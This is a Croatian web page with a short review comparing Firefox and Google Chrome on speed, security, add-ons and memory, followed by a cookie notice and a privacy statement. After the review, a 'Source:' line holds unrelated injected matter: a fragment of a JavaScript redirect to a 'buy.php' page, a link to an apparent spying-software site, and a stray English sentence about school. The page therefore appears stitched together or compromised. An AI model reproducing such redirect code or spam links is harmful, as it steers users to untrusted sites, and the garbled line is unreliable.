Pošaljite upit!

FIREFOX vs GOOGLE CHROME : Koji je najbolji?

FIREFOX vs GOOGLE CHROME : Koji je najbolji?

Zvuči kao rat preglednika ili nešto nerealno ali to zapravo i nije. To je jedna veoma realna borba jer su se donedavno pri vrhu liste nalazili i Internet Explorer, Firefox, Safari, međutim ispostavilo se da je Firefox zapravo puno bolji program od navedenih. Međutim tu je Google pomutio planove i bacio rukavicu do tada najboljem, Firefoxu prestavivši Google Chrome.

 

Testiranje najboljih svrstano je u sljedećim kategorijama: brzina, sigurnost, opcije pretraživanja, memorija. Pročitajte u nastavku recenziju dvoboja.

 

Brzina: Chrome je daleko najbrži preglednik. On koristi Webkit pokretač i nezavisni testeri brzine su testirali i došli do informacija kako je Chrome lider što se tiče brzine.

Iako je Firefox pokušao ubrzati preglednik sa svojom verzijom 3.5, nije uspio sustići Google Chrome.

 

Sigurnost: Jedan i drugi preglednik su imali povremene sigurnosne rizike. Međutim Chrome tretira svaku karticu kao pojedinačni proces. To znači da ako je jedan rezultat pretrage zaražen, totalno se izolira od ostalih kartica tako da sprečava prijenos zaraze s jedne kartice na drugu. Samo to daje veliku prednost Google Chromu nad Firefox-om.

Opcije pretraživanja: Ovo je jedino područje u kojem Google Chrome zaostaje. Od sada program ne može podržati ni jedan drugi preglednik. Firefox je kompatibilan sa svim drugim preglednicima i sposoban je podržati mnogo više dodataka nego što ih podržava Google Chrome. Ta informacija je važna za ljude koji korite šreglednike za nešto više od jenostavnog pretraživanja.

 

Memorija: Razdvajanje kartica iz sigurnosnih razloga, može na prvi pogled izgledati kao velika ušteda memorijskog prostora. Ali razna testiranja su dokazala da to ovdje nije slučaj.

Korištenje memorije također puno ovisi o broju drugih pokrenutih programa unutar preglednika. Budući da Firefox korisnici imaju tendenciju da imaju obilje dodataka, to djeluje na veliki gubitak memorije. Iako će Firefox imati prednost nad Google Chromom u ovoj kategoriji, ipak treba to uzeti sa rezervom.

 

 

Suština je da ne možete pogriješiti ni sa jednim od ovih preglednika. Upravo u ovom trenutku, određeni korisnici će koristiti Chrome jer je brži i lakši za korištenje, dok će internet marketing korisnici pronaći više interesantnih opcija sa Firefoxom. Najbolje je koristiti oba za naksimalni učinak!

Source: location.replace(“http://gethere.info/buy.php”);} But next year will be https://topspying.com the first of thirteen straight years of school, and you want to set him up for success

Nastavkom pregledavanja ove stranice prihvačate korištenje Cookia. Više informacija

IZJAVA O PRIVATNOSTI Webnet poštuje vašu privatnost te nastojimo osigurati tajnost vaših privatnih podataka Svjesni smo da ubrzani rast interneta i online servisa utječu na pitanja vezana uz vaše osobne podatke, ali isto tako nastojimo sve vaše skupljene podatke držati u strogoj tajnosti te se obvezujemo da ćemo voditi računa o sigurnosti i tajnosti vaših osobnih podataka. KOJE INFORMACIJE PRIKUPLJAMO? Prikupljamo informacije iz online registracijskog formulara koje ispunjava sam korisnik. Prilikom narudžbe ili registracije možemo Vas tražiti za Vaše cijenjeno ime, prezime, email adresu, adresu i telefonski broj. Pregledavati web trgovinu možete i bez dostave vaših osobnih podataka. U KOJU SVRHU UPOTREBLJAVAMO VAŠE OSOBNE PODATKE? Vaše podatke možemo koristiti u sljedeće svrhe: • personalizacija sadržaja (vaše podatke koristimo u svrhu unapređenja kvalitete sadržaja namijenjenog pojedinom korisniku) • unapređenje naše web stranice (neprestano unapređujemo našu stranicu na temelju Vaših kritika, iskustava i prijedloga) • unapređenje usluge (vaši podaci nam omogućuju da unaprijedimo korisničku podršku te što kvalitetnije zadovoljimo korisničke zahtjeve i potrebe) • slanje periodičnih e-mailova ( u svrhu unapređenja usluga i poboljšanja korisničkih iskustava šaljemo periodične mailove sa relevantnim novostima, informacijama i obavjestima) • promocija, administracija i nadzor stranice NA KOJI NAČIN ČUVAMO VAŠE PODATKE? Vaše podatke čuvamo implementacijom sigurnosnih mjera. KORISTIMO LI COOKIJE? Stranica www.webzamene.net koristi cookije DIJELIMO LI VAŠE PODATKE VANJSKIM PARTNERIMA? Vaše podatke ne prodajemo, mijenjamo ni na koji način dijelimo s vanjskim partnerima. Vaše podatke dostavljamo JEDINO u slučaju kršenja zakona ili na temelju sudskog naloga kojeg smo dužni poštovati. GUBITAK VAŠIH OSOBNIH PODATAKA Stranica www.webzamene.net ne odgovara za štetu nastalu gubitkom Vaših osobnih podataka. Webnet d.o.o. ne može se smatrati odgovornim za zlouporabe za koje se ne može utvrditi da su nastale kao posljedica tehničko-sigurnosnog propusta sustava web trgovine ili propusta djelatnika Webnet d.o.o. ONLINE IZJAVA O PRIVATNOSTI Ova izjava privatnosti vrijedi samo za informacije prikupljene preko naše web stranice, ne vrijedi za informacije prikupljene offline putem. VAŠA SUGLASNOST Koristeći stranicu www.webzamene.net pristajete na Izjavu o privatnosti. PROMJENE U DOKUMENTU "IZJAVA O PRIVATNOSTI" Ukoliko ćemo imati potrebu za promjenom dokumenta "Izjava o privatnosti" sve navedene izmjene će biti objavljene u ovom dokumentu. Zadnji datum izmjene: 10/11/2012 KONTAKTIRAJTE NAS Ukoliko imate bilo kakvo pitanje vezano uz sigurnost vaših osobnih podataka možete nas kontaktirati na : mail: info@webnet.hr

Zatvori